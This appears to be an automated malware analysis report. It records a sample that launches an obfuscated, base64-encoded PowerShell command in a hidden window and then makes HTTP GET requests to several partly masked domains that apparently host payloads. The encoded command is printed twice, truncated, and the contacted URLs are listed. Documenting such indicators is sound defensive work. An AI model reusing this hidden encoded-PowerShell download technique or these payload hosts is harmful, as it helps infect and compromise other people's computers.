Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABDAEwARQBGAEMAeABiAHgAPQAnAFEASABLAEoARwByAGcAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBjAGAAVQBSAGkAVABZAFAAYABSAG8AdABvAGMATwBMACIAIAA9AC...
Network activity
TCP
HTTP GET requests
- http://mo###lly.com/aspnet_client/T9J975/
- http://dc###ech.com/dcpl-2020-50/CWg3898/
- http://pr#####owertools.com/wp-content/qir8lq/
UDP
- DNS ASK me##ia.com
- DNS ASK mo###lly.com
- DNS ASK wo######s.eastbayhub.com
- DNS ASK dc###ech.com
- DNS ASK pr#####owertools.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABDAEwARQBGAEMAeABiAHgAPQAnAFEASABLAEoARwByAGcAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBjAGAAVQBSAGkAVABZAFAAYABSAG8AdABvAGMATwBMACIAIAA9AC...' (with hidden window)
